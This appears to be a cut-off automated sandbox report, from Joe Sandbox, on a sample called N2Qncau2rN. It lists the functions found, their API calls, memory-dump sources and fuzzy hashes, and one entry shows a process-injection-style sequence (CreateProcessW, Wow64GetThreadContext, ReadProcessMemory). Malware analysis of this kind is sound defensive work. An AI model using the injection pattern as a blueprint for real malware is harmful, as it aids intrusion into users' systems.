                                                                                                                                                                                                                Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeInfoLibraryParametersSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3403648963-0
                                                                                                                                                                                                                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                                                                                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                                                                                                                Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                                                                                                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                                                                                                                                Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                                                                                                                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                                                                                                                • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2800547568-0
                                                                                                                                                                                                                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                                                                                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                                                                                                                Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __lock_file.LIBCMT ref: 00415012
                                                                                                                                                                                                                • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2999321469-0
                                                                                                                                                                                                                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                                                                                                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                                                                                                                Function 040DD2DD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 040DDA9B
                                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040DDB31
                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040DDB53
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1675230613.00000000040DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040DC000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_40dc000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2438371351-0
                                                                                                                                                                                                                • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                                                                                                                                                                                • Instruction ID: efb79f22e0bb4b5b5d9a995a5e1eda386f045b9f72c6aa3b5ade42cf83ff56af
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C212EF24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5F85CF5A
                                                                                                                                                                                                                Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                                                                                                • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                                                                                                                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                                                                                                                Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                                                                                                • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                                                                                                                                                                • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                                                                                                                                                                                Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                                                                                                                Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                                                                                                                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                                                                                                                Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                                                                                                                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                                                                                                                Function 00444AF8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00444B34
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _malloc_memmove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1183979061-0
                                                                                                                                                                                                                • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                                                                                                                                                                • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                                                                                                                                                                                Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __lock_file
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3031932315-0
                                                                                                                                                                                                                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                                                                                                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                                                                                                                Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                                                                                                • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                                                                                                                                Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
